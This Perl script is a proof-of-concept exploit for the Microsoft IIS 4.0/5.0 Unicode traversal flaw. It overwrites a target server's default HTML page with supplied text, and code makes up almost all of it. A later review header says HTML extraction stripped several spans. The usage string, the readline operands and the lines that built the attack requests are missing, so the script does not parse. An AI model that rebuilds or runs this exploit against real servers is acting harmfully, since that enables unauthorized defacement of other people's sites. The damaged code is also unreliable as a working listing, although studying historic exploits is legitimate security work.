#!/usr/bin/perl -w
## [ FOR TESTING PURPOSES ONLY - THIS IS NOT A DEFACEMENT TOOL! ]
##
## Microsoft-IIS Remote Proof of Concept Exploit
## (Unicode vulnerability)
##
## -------------------------------------------------------------
##
## Vulnerable:
## ~~~~~~~~~~~
## -- Microsoft IIS 5.0 / Microsoft Windows NT 2000
## -- Microsoft IIS 4.0 / Microsoft Windows NT 4.0
##
## -- Microsoft BackOffice 4.5 / Microsoft Windows NT 4.0
## -- Microsoft BackOffice 4.0 / Microsoft Windows NT 4.0
##
## -------------------------------------------------------------
##
## Exploits Details:
## ~~~~~~~~~~~~~~~~~
## == The host you want to try this on. (surprise)
##
## == A textfile containing what you want to be
##    echoed into the index file. Html code will
##    not work. Keep it short, like: wh0a, 1t w0rked!
##
## == The path and name of the default html file. If
##    you don't define it - this exploit will use:
##    C:\inetpub\wwwroot\default.htm as default.
##
## E.g: ./exploit 0 file.txt C:\Inetpub\wwwroot\Default.htm
##
## Note: This (stupid) exploit does not do much error checking.
##
## -------------------------------------------------------------
##
## Credits:
## ~~~~~~~~
## - The genius who wrote about this in the Packetstorm forum.
## - Rain.forest.puppy for his advisory with words of wisdom.
## - Nsfocus Security Teams for their great post to Bugtraq.
##
## /* Exploit was tested successfully on W2K using ISS 5.0 */
##
## teleh0r@doglover.com || http://teleh0r.cjb.net
##
## -------------------------------------------------------------
##
## NOTE(review): this listing survived an HTML extraction that stripped
## every "<...>" span.  Three places are visibly damaged and are left
## byte-for-byte as found: the usage string, each `defined($_ = )`
## readline (the `<SOCKET>` / `<FILE>` operand is gone), and the line
## that once assigned $copy and $echo (only a fragment remains).  The
## script as shown does not parse; nothing below reconstructs it.
##
## Script flow, as far as the visible code shows: connect to $host:80,
## grab the "Server:" banner with a HEAD request, read $file into
## $string, mangle it into a request-line-safe form, send two GET
## requests built from $copy and $echo, then dump "GET /" to stdout.
## Every request is plain HTTP/1.0 on port 80, so the full request
## line of each step lands in the server's access log.
##
## Only -w is in effect; there is no `use strict`, so a mistyped
## variable would silently become a package global.

use Socket;

# Host and text file are required; the third argument (path) is optional.
if (@ARGV < 2) {
    print("Usage: $0 [\n");   # NOTE(review): usage text truncated by extraction, see header
    exit(1);
}

# File-scoped lexicals; connect_host() below closes over $host and the
# socket scratch variables ($iaddr, $paddr, $proto).
my($host,$file,$path,$nl,$string,$copy,$echo, $iaddr,$paddr,$proto,$version);
($host,$file,$path) = @ARGV;
$nl = "\015\012\015\012"; # be strict in what you provide... (CRLF CRLF: terminates the HTTP/1.0 header block)

if (!(defined($path))) {
    $path = "C:\\inetpub\\wwwroot\\default.htm"; # C:\inetpub\wwwroot is the default path on w2k. NT 4?
}

# Quick and dirty way of getting the server banner.
# Sends HEAD / and keeps the first response line starting with "Server".
connect_host();
send(SOCKET, "HEAD / HTTP/1.0$nl", 0);

LOOP: while (defined($_ = )) {   # NOTE(review): readline operand lost in extraction
    if ($_ =~ m/^Server/) {
        $version = $_;           # raw header line, e.g. "Server: ..." (constructed example)
        chomp($version);
        last(LOOP);
    }
}
# The banner socket is not closed here; the next connect_host() simply
# re-opens the same bareword handle SOCKET.

if (!(defined($version))) {
    $version = "UNKNOWN";
}

print("\nRemote host: $host\n");
print("$version\n");
print("Path: $path\n");

# Two-arg open on a bareword handle.  The mode is pinned to "<" here,
# but the 3-arg form `open(my $fh, '<', $file)` would keep the filename
# from ever being parsed for mode characters.
open(FILE, "<$file") || die("Error $file: $!\n");
while (defined($_ = )) {         # NOTE(review): readline operand lost in extraction
    $string .= $_;
}
close(FILE);

# Spaces and newlines become "+", presumably because $string is later
# placed in a GET request line (the $echo assignment is missing, so this
# cannot be confirmed from the visible code).
$string =~ s/ /\+/g;
$string =~ s/\n/\+/g;

# NOTE(review): damaged fragment.  What remains looks like the tail of a
# check that rejects ">" / "<" in $string followed by the assignments
# to $copy and $echo; everything between the first "<" and the next ">"
# was stripped.  Left exactly as found.
if ($string =~ m/\>/g || $string =~ m/\+$path";

print("\nAttemting exploitation of $host ...\n\n");
# First request: built from $copy (assignment missing above).
connect_host();
send(SOCKET,"GET $copy HTTP/1.0$nl", 0);
close(SOCKET);
sleep(5); # Don't you remember how slow Windows is?

# Second request: built from $echo (assignment missing above).
connect_host();
send(SOCKET,"GET $echo HTTP/1.0$nl", 0);
close(SOCKET);
sleep(5); # Let me tell you then - it is s l o w !

# Fetch "/" afterwards and echo the whole response so the operator can
# see whether the page changed.  "50" is used as a number by x.
print("-"x"50", "\n\n");
connect_host();
send(SOCKET,"GET / HTTP/1.0$nl", 0); # I'm lazy
while (defined($_ = )) {         # NOTE(review): readline operand lost in extraction
    print("$_");
}
close(SOCKET);
print("\n", "-"x"50", "\n");
exit(0);

# connect_host: open a fresh TCP connection to $host on port 80 and
# attach it to the global bareword handle SOCKET.
#
# Reads:   $host (file-scoped lexical set from @ARGV)
# Writes:  $iaddr, $paddr, $proto, and the SOCKET handle
# Returns: nothing useful; every failure is fatal via die.
# Caveats: the port is hard-coded; `||` binds to the last argument of
# each call rather than to the call's return value, which happens to be
# harmless here only because each function takes the expected value.
sub connect_host {
    $iaddr = inet_aton($host) || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr) || die("Error: $!\n");
}